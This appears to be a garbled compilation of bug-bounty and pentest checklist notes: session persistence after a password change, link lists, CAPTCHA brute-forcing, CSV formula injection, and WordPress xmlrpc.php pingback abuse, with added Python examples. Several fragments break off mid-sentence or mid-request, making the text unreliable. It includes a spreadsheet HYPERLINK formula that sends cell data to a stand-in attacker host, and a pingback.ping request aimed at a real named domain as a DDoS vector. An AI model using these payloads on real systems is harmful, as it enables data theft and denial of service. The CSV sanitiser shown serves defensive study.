In C2FO, changing the password does not destroy the other sessions that are logged in with the old password. As the other sessions are not destroyed, the attacker will still be logged in to your account even after the password change, because his session is still active. He will have complete access to your account until that session expires! So your account remains insecure even after changing the password.

PATCH

When someone changes his/her password, each and every active session that belongs to that particular account must be destroyed! I would recommend you follow Facebook on this security issue. They fixed this issue a few months back by adding a process that asks users whether they want to close all open sessions right after changing the password.

So there are two ways: either you let users choose if they want to keep active sessions or just destroy every
These are general test cases written with a typical product-purchase web application in mind. However, test cases vary from application to application. By analysing request parameters these test cases can be expanded in future.
Resources for chintan
1. Follow this guy - https://twitter.com/soaj1664ashar
2. View the slides - http://slides.com/mscasharjaved/on-breaking-php-based-cross-site-scripting-protections-in-the-wild#/
3. View the video related to the slides above - https://www.youtube.com/watch?v=TKn5qdti66c
http://oldmanlab.blogspot.in/2012/03/sqlmap-tutorial-you-are-just.html
Refer to the PDFs below:
1. http://www.onapsis.com/slides/ONAPSIS-Penetration_Testing_SAP.pdf
2. https://www.blackhat.com/presentations/bh-europe-09/DiCroce/BlackHat-Europe-2009-DiCroce-CYBSEC-Publication-SAP-Penetration-Testing-slides.pdf
3. http://information.rapid7.com/rs/rapid7/images/SAP%20Penetration%20Testing%20Using%20Metasploit%20Final.pdf
If so, an attacker can download all 100-200 images, learn each one's value, and then write a small program to brute-force the CAPTCHA.

We can inject formulas into any field of a member in an email group (=2*10, for example). When the group is exported to CSV, the formula is evaluated to 20 in the corresponding cell. This lets an attacker spread malware and execute system-level commands on a victim's machine if the victim downloads and opens the CSV file.
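The export that produces the =2*10 cell described above, next to a sanitised export, as an added Python example (not code from the checklist or from the application in the remark). The member rows are constructed; the fix is the standard one of prefixing any cell that starts with a formula trigger (=, +, -, @, tab, carriage return) with a single quote so the spreadsheet treats it as text.

```python
"""Added example: CSV injection in an export and the sanitised version. MEMBERS is a
constructed list of rows; the exporter uses only the standard library."""
import csv
import io

# Leading characters that Excel, LibreOffice and Google Sheets treat as the start of a formula.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

def neutralise_cell(value):
    """Prefix formula-like cells with a single quote so they are stored and shown as text.
    csv.writer with QUOTE_ALL doubles any embedded quotes, so the prefix cannot be escaped."""
    text = "" if value is None else str(value)
    if text.startswith(FORMULA_TRIGGERS):
        text = "'" + text
    return text

def export_members(rows, sanitise):
    """Write the member list as CSV; with sanitise=False this is the vulnerable export."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(["name", "email", "note"])
    for row in rows:
        writer.writerow([neutralise_cell(c) if sanitise else c for c in row])
    return buf.getvalue()

# Constructed member records (assumption). The "note" field is user-controlled.
MEMBERS = [
    ("Alice", "alice@xyz.tld", "=2*10"),
    ("Mallory", "mallory@xyz.tld", '=HYPERLINK("http://attacker.tld/?"&B2,"open me")'),
    ("Bob", "bob@xyz.tld", "-1 day late"),
    ("Carol", "carol@xyz.tld", "plain note"),
]

def exported_note_cells(sanitise):
    """Round-trip the export through csv.reader and return the note column as a
    spreadsheet would receive it."""
    text = export_members(MEMBERS, sanitise)
    rows = list(csv.reader(io.StringIO(text)))
    return [row[2] for row in rows[1:]]

if __name__ == "__main__":
    print("vulnerable:", exported_note_cells(False))
    print("sanitised: ", exported_note_cells(True))
```

The quoting that csv.writer applies is not by itself a defence: a cell that reads `"=2*10"` in the file is still a formula once the quotes are stripped on import. Only the leading apostrophe changes how the spreadsheet interprets the cell, and Bob's "-1 day late" shows why minus signs have to be covered as well as equals signs.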
    <methodName>demo.sayHello</methodName>
    <params>
    <param>
    <value>admin</value>
    </param>
    </params>
    </methodCall>

Notice that a successful response is received, showing that the xmlrpc.php file is enabled.

Now, considering the blog post https://withinsecurity.com/2015/10/is-there-really-a-cybersecurity-skills-gap/ on the withinsecurity.com domain, the xmlrpc.php file discussed above could potentially be abused to cause a DDoS attack against a victim host. This is achieved by simply sending a request that looks like the one below. See Screenshot 2:

    POST /xmlrpc.php HTTP/1.1
    Host: withinsecurity.com
    Connection: keep-alive
    Content-Length: 293

    <methodCall>
    <methodName>pingback.ping</methodName>
    <params>
    <param>
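The two checks in the remark above (does xmlrpc.php answer a demo.sayHello call, and does it expose pingback.ping) as an added Python example built on the standard library's xmlrpc.client; it is not code from the checklist or from the HackerOne report. The HTTP transport is replaced by a stub, and the responses it returns are constructed, so the script runs offline; swap `post` for a real POST to /xmlrpc.php to use it. It builds the pingback.ping request so its shape can be inspected, but it does not send it anywhere.

```python
"""Added example: probing WordPress xmlrpc.php with xmlrpc.client. `post` is a stand-in
for the HTTP call and FAKE_RESPONSES are constructed."""
import xmlrpc.client

def build_call(method, *params):
    """Serialise a <methodCall> body exactly as xmlrpc.php expects it."""
    return xmlrpc.client.dumps(params, methodname=method)

def parse_response(body):
    """Return (params, fault_string): params on success, the fault text on a <fault>."""
    try:
        params, _ = xmlrpc.client.loads(body)
        return params, None
    except xmlrpc.client.Fault as fault:
        return None, fault.faultString

# Constructed response bodies standing in for a live endpoint (assumption).
FAKE_RESPONSES = {
    "demo.sayHello": (
        "<?xml version='1.0'?><methodResponse><params><param>"
        "<value><string>Hello!</string></value></param></params></methodResponse>"
    ),
    "system.listMethods": xmlrpc.client.dumps(
        (["system.listMethods", "demo.sayHello", "pingback.ping", "wp.getUsersBlogs"],),
        methodresponse=True,
    ),
}

def post(body):
    """Stub transport: look up the method name in the request and return the canned reply."""
    _, method = xmlrpc.client.loads(body)
    return FAKE_RESPONSES[method]

def probe_xmlrpc(post_fn=post):
    """Is xmlrpc.php enabled, does it expose pingback.ping, and which wp.* methods
    (the ones that accept credentials, hence brute-forceable) are listed?"""
    hello, fault = parse_response(post_fn(build_call("demo.sayHello", "admin")))
    if fault or not hello:
        return {"enabled": False, "reason": fault}
    listed, _ = parse_response(post_fn(build_call("system.listMethods")))
    methods = list(listed[0]) if listed else []
    return {
        "enabled": True,
        "pingback": "pingback.ping" in methods,
        "auth_methods": [m for m in methods if m.startswith("wp.")],
    }

def pingback_request(source_uri, target_uri):
    """The body shown in the remark: pingback.ping(sourceURI, targetURI). Built for
    inspection only; sending it makes the target server fetch sourceURI."""
    return build_call("pingback.ping", source_uri, target_uri)

if __name__ == "__main__":
    print(probe_xmlrpc())
    print(pingback_request("http://source.tld/post", "https://withinsecurity.com/2015/10/is-there-really-a-cybersecurity-skills-gap/"))
```

A `<fault>` with faultString "XML-RPC services are disabled" is what a hardened site returns, and parse_response surfaces it as the `reason`; a 200 with a non-XML body (a WAF page, say) raises from xmlrpc.client.loads and is a different finding, so it is left to propagate rather than swallowed.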

https://hackerone.com/reports/90131

https://www.owasp.org/index.php/CSV_Excel_Macro_Injection
https://medium.com/bugbountywriteup/from-security-misconfiguration-to-gaining-access-of-smtp-server-ed833e757e6e

SAML Decoder - https://www.samltool.com/decode.php

https://apapedulimu.click/clickjacking-on-google-myaccount-worth-7500/

https://medium.com/bugbountywriteup/how-i-earned-5040-from-twitter-by-showing-a-way-to-harvest-other-users-ip-address-e9f

https://medium.com/@kunal94/imagemagick-gif-coder-vulnerability-leads-to-memory-disclosure-hackerone-e9975a6a560e

XXE in bol.com
